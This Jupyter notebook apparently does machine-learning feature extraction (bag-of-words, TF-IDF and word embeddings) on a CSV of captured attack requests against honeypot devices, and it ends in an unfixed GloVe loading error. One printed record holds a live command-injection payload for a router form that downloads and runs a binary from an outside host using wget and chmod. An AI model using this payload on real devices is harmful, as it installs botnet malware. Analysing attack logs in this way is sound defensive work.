In [1]:
!pip install nltk
!pip install gensim


[notice] A new release of pip is available: 23.3.1 -> 23.3.2
[notice] To update, run: python.exe -m pip install --upgrade pip



[notice] A new release of pip is available: 23.3.1 -> 23.3.2
[notice] To update, run: python.exe -m pip install --upgrade pip


In [2]:
# Python program to generate word vectors using Word2Vec

# importing all necessary modules
from gensim.models import Word2Vec
import gensim
from nltk.tokenize import sent_tokenize, word_tokenize
import warnings
import pandas as pd
warnings.filterwarnings(action='ignore')


# Reads ‘alice.txt’ file
data = pd.read_csv("attack data.csv")


In [3]:
data

,local_ip,remote_ip,remote_port,local_port,tag_label,attack_time,target_profile,node_id,ASN,attack_data,...,path,User-Agent,Accept-Encoding,Accept,Qualys-Scan,Content-Length,Content-Type,Referrer,Host,body
0,103.7.128.35,164.90.188.49,41684,80,CID-1032,2023-11-01T00:00:55,device:iot:Printer:HPLaserJet,168,AS14061,"{'method': 'GET', 'path': '/files/', 'headers'...",...,/files/,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...,gzip,*/*,NaN,NaN,NaN,NaN,103.7.128.35,NaN
1,103.7.128.35,164.90.188.49,41686,80,CID-980,2023-11-01T00:00:55,device:iot:Printer:HPLaserJet,168,AS14061,"{'method': 'GET', 'path': '/files/', 'headers'...",...,/files/,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...,gzip,*/*,NaN,NaN,NaN,NaN,103.7.128.35,NaN
2,115.112.148.214,89.190.156.170,56272,8080,CVE-2023-26801,2023-11-01T00:25:50,device:web:server:Apache,105,AS49870,"{'method': 'POST', 'path': '/goform/set_LimitC...",...,/goform/set_LimitClient_cfg,Go-http-client/1.1,gzip,NaN,NaN,201.0,NaN,NaN,115.112.148.214:8080,time1=00:00-00:00&time2=00:00-00:00&mac=;killa...
3,103.206.104.45,37.187.215.251,24179,80,CVE-2017-6884,2023-11-01T00:58:18,device:scada:plc:Delta_Electronics,95,AS16276,"{'method': 'GET', 'path': '/cgi-bin/luci', 'he...",...,/cgi-bin/luci,Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109...,NaN,"text/html,application/xhtml+xml,application/xm...",NaN,NaN,NaN,NaN,103.206.104.45,NaN
4,49.248.120.5,89.190.156.170,55178,8080,CVE-2023-26801,2023-11-01T00:26:00,device:web:server:Apache,276,AS49870,"{'method': 'POST', 'path': '/goform/set_LimitC...",...,/goform/set_LimitClient_cfg,Go-http-client/1.1,gzip,NaN,NaN,201.0,NaN,NaN,49.248.120.5:8080,time1=00:00-00:00&time2=00:00-00:00&mac=;killa...
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
1092,121.244.94.28,172.104.173.116,60878,80,CID-1103,2023-11-03T13:35:55,device:iot:IPCamera:MotionEye,479,AS63949,"{'method': 'GET', 'path': '/ords/', 'headers':...",...,/ords/,Mozilla/4.0 (compatible; MSIE 8.0; Windows NT ...,NaN,"image/gif, image/x-xbitmap, image/jpeg, image/...",NaN,NaN,NaN,NaN,121.244.94.28,NaN
1093,121.244.94.28,172.104.173.116,33006,80,CID-1103,2023-11-03T13:36:03,device:iot:IPCamera:MotionEye,479,AS63949,"{'method': 'GET', 'path': '/lcgi/sewse.nlm?sys...",...,/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/se...,Mozilla/4.0 (compatible; MSIE 8.0; Windows NT ...,NaN,"image/gif, image/x-xbitmap, image/jpeg, image/...",NaN,NaN,NaN,NaN,121.244.94.28.static-Banglore.vsnl.net.in,NaN
1094,121.244.94.22,172.104.173.116,53992,80,CID-1276,2023-11-03T13:32:47,device:iot:IPCamera:DNVRS-Web,479,AS63949,"{'method': 'GET', 'path': '/ControlManager/def...",...,/ControlManager/default.htm,Mozilla/4.0 (compatible; MSIE 8.0; Windows NT ...,NaN,"image/gif, image/x-xbitmap, image/jpeg, image/...",NaN,NaN,NaN,NaN,121.244.94.22.static-Banglore.vsnl.net.in,NaN
1095,121.244.94.28,172.104.173.116,41416,80,CID-1117,2023-11-03T13:36:18,device:iot:IPCamera:MotionEye,479,AS63949,"{'method': 'GET', 'path': '/help/contents.htm'...",...,/help/contents.htm,Mozilla/4.0 (compatible; MSIE 8.0; Windows NT ...,NaN,"image/gif, image/x-xbitmap, image/jpeg, image/...",NaN,NaN,NaN,NaN,121.244.94.28.static-Banglore.vsnl.net.in,NaN


In [4]:
train = data['attack_data'].str.replace('[^a-zA-Z]',' ').str.lower()

In [5]:
train

0         method    get    path     files     headers ...
1         method    get    path     files     headers ...
2         method    post    path     goform set limitc...
3         method    get    path     cgi bin luci    he...
4         method    post    path     goform set limitc...
                              ...                        
1092      method    get    path     ords     headers  ...
1093      method    get    path     lcgi sewse nlm sys...
1094      method    get    path     controlmanager def...
1095      method    get    path     help contents htm ...
1096      method    get    path     sgms login    head...
Name: attack_data, Length: 1097, dtype: object

In [6]:
data1 = data.columns[10:]

In [7]:
joined_data = data[data1].apply(lambda x: ' '.join(x.astype(str)), axis=1)

In [8]:
joined_data

0       GET /files/ Mozilla/5.0 (Windows NT 10.0; Win6...
1       GET /files/ Mozilla/5.0 (Windows NT 10.0; Win6...
2       POST /goform/set_LimitClient_cfg Go-http-clien...
3       GET /cgi-bin/luci Mozilla/5.0 (X11; Ubuntu; Li...
4       POST /goform/set_LimitClient_cfg Go-http-clien...
                              ...                        
1092    GET /ords/ Mozilla/4.0 (compatible; MSIE 8.0; ...
1093    GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/doc...
1094    GET /ControlManager/default.htm Mozilla/4.0 (c...
1095    GET /help/contents.htm Mozilla/4.0 (compatible...
1096    GET /sgms/login Mozilla/4.0 (compatible; MSIE ...
Length: 1097, dtype: object

In [9]:
names_and_cities = joined_data.tolist()

In [10]:
names_and_cities

['GET /files/ Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 gzip */* nan nan nan nan 103.7.128.35 nan',
 'GET /files/ Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 gzip */* nan nan nan nan 103.7.128.35 nan',
 'POST /goform/set_LimitClient_cfg Go-http-client/1.1 gzip nan nan 201.0 nan nan 115.112.148.214:8080 time1=00:00-00:00&time2=00:00-00:00&mac=;killall -9 /bin/sh; killall -9 /z/bin; killall -9 /bin/bash; rm -rf *mpsl*; wget http://boats.dogmuncher.xyz/Aqua.mpsl; chmod 777 Aqua.mpsl; ./Aqua.mpsl lblink;',
 'GET /cgi-bin/luci Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 nan text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 nan nan nan nan 103.206.104.45 nan',
 'POST /goform/set_LimitClient_cfg Go-http-client/1.1 gzip nan nan 201.0 nan nan 49.248.120.5:8080 time1=00:00-00:00&time2=00:00-00:00&mac=;killall -9

In [23]:
import nltk
import string 
import re

In [24]:
nltk.download('punkt')

[nltk_data] Downloading package punkt to
[nltk_data]     C:\Users\vinee\AppData\Roaming\nltk_data...
[nltk_data]   Package punkt is already up-to-date!


True

In [30]:
def remove_special_characters(sentence):
    return re.sub(r'[^a-zA-Z0-9\s]', ' ', sentence)

In [31]:
series = joined_data.apply(remove_special_characters)

In [32]:
series

0       GET  files  Mozilla 5 0  Windows NT 10 0  Win6...
1       GET  files  Mozilla 5 0  Windows NT 10 0  Win6...
2       POST  goform set LimitClient cfg Go http clien...
3       GET  cgi bin luci Mozilla 5 0  X11  Ubuntu  Li...
4       POST  goform set LimitClient cfg Go http clien...
                              ...                        
1092    GET  ords  Mozilla 4 0  compatible  MSIE 8 0  ...
1093    GET  lcgi sewse nlm sys  novonyx suitespot doc...
1094    GET  ControlManager default htm Mozilla 4 0  c...
1095    GET  help contents htm Mozilla 4 0  compatible...
1096    GET  sgms login Mozilla 4 0  compatible  MSIE ...
Length: 1097, dtype: object

In [33]:
series[0]

'GET  files  Mozilla 5 0  Windows NT 10 0  Win64  x64  AppleWebKit 537 36  KHTML  like Gecko  Chrome 108 0 0 0 Safari 537 36 gzip     nan nan nan nan 103 7 128 35 nan'

In [34]:
joined_data[0]

'GET /files/ Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 gzip */* nan nan nan nan 103.7.128.35 nan'

In [38]:

from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer



# Initialize a CountVectorizer
count_vectorizer = CountVectorizer()

# Fit and transform the data
count_vectors = count_vectorizer.fit_transform(joined_data)

# Convert to a DataFrame for better visualization
count_df = pd.DataFrame(count_vectors.toarray(), columns=count_vectorizer.get_feature_names_out())

# Display the resulting vectors
print("Count Vectors:")
print(count_df)

# Initialize a TfidfVectorizer
tfidf_vectorizer = TfidfVectorizer()

# Fit and transform the data
tfidf_vectors = tfidf_vectorizer.fit_transform(joined_data)

# Convert to a DataFrame for better visualization
tfidf_df = pd.DataFrame(tfidf_vectors.toarray(), columns=tfidf_vectorizer.get_feature_names_out())

# Display the resulting vectors
print("\nTF-IDF Vectors:")
print(tfidf_df)


Count Vectors:
      00  09  0a  0acat  0nvit0shofjoc  0x  10  100  10011  101  ...  yaml  \
0      0   0   0      0              0   0   1    0      0    0  ...     0   
1      0   0   0      0              0   0   1    0      0    0  ...     0   
2      8   0   0      0              0   0   0    0      0    0  ...     0   
3      0   0   0      0              0   0   0    0      0    0  ...     0   
4      8   0   0      0              0   0   0    0      0    0  ...     0   
...   ..  ..  ..    ...            ...  ..  ..  ...    ...  ...  ...   ...   
1092   0   0   0      0              0   0   0    0      0    0  ...     0   
1093   0   0   0      0              0   0   0    0      0    0  ...     0   
1094   0   0   0      0              0   0   0    0      0    0  ...     0   
1095   0   0   0      0              0   0   0    0      0    0  ...     0   
1096   0   0   0      0              0   0   0    0      0    0  ...     0   

      ylacthrnqx8kdhkumnbfpzf06y  yml  z72280628

In [39]:
tfidf_df.head(1000)

,00,09,0a,0acat,0nvit0shofjoc,0x,10,100,10011,101,...,yaml,ylacthrnqx8kdhkumnbfpzf06y,yml,z72280628143q1,z78628424420q1,z78791758371q1,z79948222471q1,zgfostckfqkecuuokuk1ojuza3rrsztwj,zgrab,zhnping
0,0.000000,0.0,0.0,0.0,0.0,0.0,0.1794,0.0,0.0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000000
1,0.000000,0.0,0.0,0.0,0.0,0.0,0.1794,0.0,0.0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000000
2,0.687278,0.0,0.0,0.0,0.0,0.0,0.0000,0.0,0.0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000000
3,0.000000,0.0,0.0,0.0,0.0,0.0,0.0000,0.0,0.0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000000
4,0.691295,0.0,0.0,0.0,0.0,0.0,0.0000,0.0,0.0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000000
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
995,0.000000,0.0,0.0,0.0,0.0,0.0,0.0000,0.0,0.0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000000
996,0.000000,0.0,0.0,0.0,0.0,0.0,0.0000,0.0,0.0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.206319
997,0.000000,0.0,0.0,0.0,0.0,0.0,0.0000,0.0,0.0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.206319
998,0.000000,0.0,0.0,0.0,0.0,0.0,0.0000,0.0,0.0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.195781


In [41]:
!pip install spacy



     ---------------------------------------- 0.0/45.9 kB ? eta -:--:--
     ---------------------------------------- 45.9/45.9 kB 1.1 MB/s eta 0:00:00
     ---------------------------------------- 0.0/65.6 kB ? eta -:--:--
     ------------------ --------------------- 30.7/65.6 kB ? eta -:--:--
     ------------------------------------- -- 61.4/65.6 kB 1.7 MB/s eta 0:00:01
     ---------------------------------------- 65.6/65.6 kB 1.2 MB/s eta 0:00:00
     ---------------------------------------- 0.0/181.6 kB ? eta -:--:--
     -------- ------------------------------ 41.0/181.6 kB 1.9 MB/s eta 0:00:01
     ------------- ------------------------- 61.4/181.6 kB 1.7 MB/s eta 0:00:01
     ------------------------- ------------ 122.9/181.6 kB 1.2 MB/s eta 0:00:01
     ------------------------- ------------ 122.9/181.6 kB 1.2 MB/s eta 0:00:01
     ------------------------------------ - 174.1/181.6 kB 1.1 MB/s eta 0:00:01
     ------------------------------------ 181.6/181.6 kB 844.4 kB/s et


[notice] A new release of pip is available: 23.3.1 -> 23.3.2
[notice] To update, run: python.exe -m pip install --upgrade pip


In [43]:
import spacy
spacy.cli.download("en_core_web_md")

✔ Download and installation successful
You can now load the package via spacy.load('en_core_web_md')


In [44]:


# Load the spaCy model with pre-trained word embeddings
nlp = spacy.load('en_core_web_md')

# Function to get the vector for a sentence
def get_sentence_vector(sentence):
    doc = nlp(sentence)
    return doc.vector

# Apply the function to each element in the Series
embedding_vectors = series.apply(get_sentence_vector)

# Convert to a DataFrame for better visualization
embedding_df = pd.DataFrame(embedding_vectors.tolist(), columns=[f'feature_{i}' for i in range(embedding_vectors.iloc[0].shape[0])])

# Display the resulting vectors
print("Word Embedding Vectors:")
print(embedding_df)


Word Embedding Vectors:
      feature_0  feature_1  feature_2  feature_3  feature_4  feature_5  \
0     -0.473508  -1.923735   1.861214   2.075101   1.900205   1.014652   
1     -0.473508  -1.923735   1.861214   2.075101   1.900205   1.014652   
2      0.250968  -1.677609   1.248782   0.765525   1.730626  -0.273710   
3     -0.825643  -0.844684   2.096137   2.105796   1.418924   0.900249   
4      0.309143  -1.838426   1.155000   0.906211   1.815629  -0.341782   
...         ...        ...        ...        ...        ...        ...   
1092  -0.231068  -1.936640  -0.633316   1.571873   1.786768   0.456435   
1093  -0.146014  -1.516015  -0.530515   1.253823   1.702722   0.553541   
1094  -0.234845  -1.637111  -0.664142   1.591002   1.851657   0.672361   
1095  -0.059162  -1.629483  -0.906020   1.592654   1.882093   0.557700   
1096  -0.109051  -1.906599  -0.575653   1.581390   1.756164   0.515323   

      feature_6  feature_7  feature_8  feature_9  ...  feature_290  \
0      1.267867  

In [48]:

from gensim.models import KeyedVectors
from nltk.tokenize import word_tokenize




# Load GloVe word vectors (50-dimensional in this example)
glove_file = 'glove.6B.50d.txt'  # Replace with the actual path to your GloVe file
glove_model = KeyedVectors.load_word2vec_format(glove_file, binary=False)


# Function to get the vector for a sentence
def get_sentence_vector(sentence):
    tokens = word_tokenize(sentence)
    vectors = [glove_model[word] for word in tokens if word in glove_model]
    return np.mean(vectors, axis=0) if vectors else np.zeros_like(glove_model.vector_size)

# Apply the function to each element in the Series
embedding_vectors = series.apply(get_sentence_vector)

# Convert to a DataFrame for better visualization
embedding_df = pd.DataFrame(embedding_vectors.tolist(), columns=[f'feature_{i}' for i in range(glove_model.vector_size)])

# Display the resulting vectors
print("Word Embedding Vectors:")
print(embedding_df)


ValueError: invalid literal for int() with base 10: 'the'